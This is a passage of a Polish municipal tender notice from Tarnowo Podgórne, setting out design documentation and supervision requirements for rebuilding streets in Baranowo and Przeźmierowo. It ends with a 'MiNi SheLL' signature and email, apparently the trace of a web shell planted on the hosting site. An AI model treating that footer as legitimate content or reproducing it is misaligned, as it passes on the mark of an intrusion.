     - szerokość 6,0 m, nawierzchnia z betonu asfaltowego,
- ograniczona krawężnikiem 

Chodnik:
      - jednostronny od krawężnika do granicy posesji z kostki betonowej,

Pasy zieleni:
- jednostronne 

Oświetlenie uliczne:
- nie dotyczy  

Odwodnienie:
- nie dotyczy  

Wjazdy do posesji i dojścia do furtek:
- zaprojektować do szerokości istniejących bram i furtek, jeżeli nie ma bramy szerokość 
wjazdu 4,0m 

2.	Wymagania
1.	Rozwiązania projektowe, konstrukcję nawierzchni, organizację ruchu, itp. na roboczo uzgodnić w Wydziale Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne (dla każdego etapu).
2.	Projekt budowlany branży drogowej dla każdego etapu należy wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy dla każdego etapu w 3 egzemplarzach. Projekt budowlany powinien zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę . Projekt wykonawczy winien spełniać wymagania projektu wykonawczego i pozwolić Wykonawcy robót wykonać zadanie.
3.	Projekty branżowe usunięcia kolizji dla każdego etapu wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy dla każdego etapu w 3 egzemplarzach, (zakres usunięć ewentualnych kolizji przedstawić na roboczo w WID - UGTP). Projekty winny posiadać wszystkie niezbędne uzgodnienia, zgody i zatwierdzenia. Uzgodnienia dołączone do projektów winny być czytelne i opatrzone komentarzem projektanta. 
4.	Wykonać badania gruntowo-wodne oraz badania  nośności nawierzchni
5.	Projekty organizacji ruchu dla każdego etapu (uzgodnione i zatwierdzone) - 6 egz.
6.	Przedmiar robót dla poszczególnych branż opracować w 3 egzemplarzach,
7.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót dla poszczególnych branż opracować w 4 egzemplarzach, 
8.	Kosztorys inwestorski - opracować i uzgodnić z Wydziałem Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne - opracować w 2 egzemplarzach,
9.	Dokumentację projektową, przedmiary robót, kosztorysy inwestorskie opracować 
w 2 egzemplarzach w wersji elektronicznej w tym:
- pliki tekstowe - format *.pdf oraz *.tiff, *.xls, *.doc
- pliki graficzne - format *dwg oraz  *pdf i *.tiff
Dla każdego etapu osobno.
10.	Dokumentację projektową należy opracować na aktualnym podkładzie geodezyjnym (numerycznym) oraz przekazać w wersji *.dwg oraz *.tiff oraz wypisami z rejestru gruntów. 
11.	Badania gruntowo-wodne podłoża oraz nośności istniejącej nawierzchni w 3 egzemplarzach
12.	Informacja dotycząca bezpieczeństwa i ochrony zdrowia w 4 egzemplarzach dla każdego etapu.
13.	Szczegółowa inwentaryzacja drzew i krzewów (należy uzyskać zgodę na wycinkę, jeżeli zajdzie taka potrzeba) w 4 egzemplarzach
14.	Uzyskanie pozwolenia na budowę / zgłoszenie zamiaru budowy (wykonania robót budowlanych)

W załączeniu:  mapa sytuacyjna terenu.

Etap II.  
Nadzór autorski nad przebudową ulic Wspólnej i Przemysława w Baranowie.
1. Nadzór autorski pełniony przez Wykonawcę obejmuje:
a) czuwanie w toku realizacji nad zgodnością rozwiązań technicznych, materiałowych użytkowych z dokumentacją projektową i obowiązującymi przepisami, w szczególności techniczno-budowlanymi oraz normami,
b) uzupełnienie szczegółów dokumentacji projektowej oraz wyjaśnienie Wykonawcy robót wątpliwości powstałych w toku realizacji,
c) uzgodnienie z inwestorem i wykonawcą możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej.
2. Wykonawca pełni nadzór autorski w formie pobytów na terenie budowy w terminach uzgodnionych z Zamawiającym w miarę potrzeb realizacyjnych, jednakże nie mniej niż jeden pobyt na budowie w ciągu miesiąca). 
3. Za nadzór autorski uważa się również wykonanie przez projektanta niezbędnych do pełnienia nadzoru autorskiego czynności poza terenem budowy, a w szczególności konsultacje z wytwórcą lub dostawcą maszyn, urządzeń, materiałów, uzgodnienia w siedzibie zamawiającego, Wykonawcy, względnie w siedzibie organu administracji państwowej lub gospodarczej albo innej osoby trzeciej w związku z realizacją zadania.
Termin pełnienia nadzoru: do czasu zakończenia budowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin wykonania etapu I - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie dokumentacji projektowej przebudowy ulicy Morelowej w Przeźmierowie (włączenie drogi do ul. Wiosny Ludów) wraz z nadzorem autorskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Etap I:
1.	Zakres opracowania - przebudowa Ul. Morelowej w Przeźmierowie  (włączenie drogi do ul. Wiosny Ludów)

Kategoria drogi:
- droga wewnętrzna
- długość odcinka - około 55 m

Jezdnia:
- szerokość 6 m
- ograniczona krawężnikiem 
- nawierzchnia z kostki brukowej

Pasy zieleni:
-obustronne

Oświetlenie uliczne:
- nie dotyczy  

Odwodnienie:
- włączenie do istniejącej kanalizacji deszczowej  w ul. Wiosny Ludów

2.	Wymagania
1.	Rozwiązania projektowe, konstrukcję nawierzchni, organizację ruchu, itp. na roboczo uzgodnić w Wydziale Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne.
2.	Projekt budowlany branży drogowej należy wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy w 3 egzemplarzach. Projekt budowlany powinien zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę . Projekt wykonawczy winien spełniać wymagania projektu wykonawczego i pozwolić Wykonawcy robót wykonać zadanie.
3.	Projekt budowlany branży instalacyjnej - kanalizacja deszczowa należy wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy w 3 egzemplarzach. Projekt budowlany powinien zawierać wszystkie elementy pozwalające uzyskać pozwolenie na budowę. Projekt wykonawczy winien spełniać wymagania projektu wykonawczego i pozwolić Wykonawcy robót wykonać zadanie.
4.	Projekty branżowe usunięcia kolizji wykonać w 4 egzemplarzach (w tym 2 egz. trwale spięte) oraz projekt wykonawczy w 3 egzemplarzach, (zakres usunięć ewentualnych kolizji przedstawić na roboczo w WID - UGTP). Projekty winny posiadać wszystkie niezbędne uzgodnienia, zgody 
i zatwierdzenia. Uzgodnienia dołączone do projektów winny być czytelne i opatrzone komentarzem projektanta. 
5.	Wykonać 2 projekty podziału nieruchomości,
6.	Przedmiar robót dla poszczególnych branż opracować w 2 egzemplarzach,
7.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót dla poszczególnych branż opracować w 4 egzemplarzach, 
8.	Kosztorys inwestorski - opracować i uzgodnić z Wydziałem Infrastruktury Drogowej Urzędu Gminy Tarnowo Podgórne - opracować w 2 egzemplarzach,
9.	Dokumentację projektową, przedmiary robót, kosztorysy inwestorskie opracować 
w 2 egzemplarzach w wersji elektronicznej w tym:
- pliki tekstowe - format *.pdf oraz *.tiff, *.xls, *.doc
- pliki graficzne - format *dwg oraz  *pdf i *.tiff
10.	Dokumentację projektową należy opracować na aktualnym podkładzie geodezyjnym (numerycznym) oraz przekazać w wersji *.dwg oraz *.tiff oraz wypisami z rejestru gruntów. 
11.	Badania gruntowo-wodne podłoża oraz nośności istniejącej nawierzchni w 3 egzemplarzach
12.	Informacja dotycząca bezpieczeństwa i ochrony zdrowia w 4 egzemplarzach
13.	Szczegółowa inwentaryzacja drzew i krzewów w 4 egzemplarzach, należy uzyskać decyzję na wycinkę drzew.
14.	Uzyskanie decyzji o zezwoleniu na realizację inwestycji drogowej.

W załączeniu:  mapa sytuacyjna terenu.



Etap II.  
Nadzór autorski nad przebudową ul. Morelowej w Przeźmierowie (włączenie drogi do ul. Wiosny Ludów).
1. Nadzór autorski pełniony przez Wykonawcę obejmuje:
a) czuwanie w toku realizacji nad zgodnością rozwiązań technicznych, materiałowych użytkowych z dokumentacją projektową i obowiązującymi przepisami, w szczególności techniczno-budowlanymi oraz normami,
b) uzupełnienie szczegółów dokumentacji projektowej oraz wyjaśnienie Wykonawcy robót wątpliwości powstałych w toku realizacji,
c) uzgodnienie z inwestorem i wykonawcą możliwości wprowadzenia rozwiązań zamiennych w stosunku do materiałów i konstrukcji przewidzianych w dokumentacji projektowej.
2. Wykonawca pełni nadzór autorski w formie pobytów na terenie budowy w terminach uzgodnionych z Zamawiającym w miarę potrzeb realizacyjnych, jednakże nie mniej niż jeden pobyt na budowie w ciągu miesiąca). 
3. Za nadzór autorski uważa się również wykonanie przez projektanta niezbędnych do pełnienia nadzoru autorskiego czynności poza terenem budowy, a w szczególności konsultacje z wytwórcą lub dostawcą maszyn, urządzeń, materiałów, uzgodnienia w siedzibie zamawiającego, Wykonawcy, względnie w siedzibie organu administracji państwowej lub gospodarczej albo innej osoby trzeciej w związku z realizacją zadania.
Termin pełnienia nadzoru: do czasu zakończenia budowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin wykonania etapu I - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com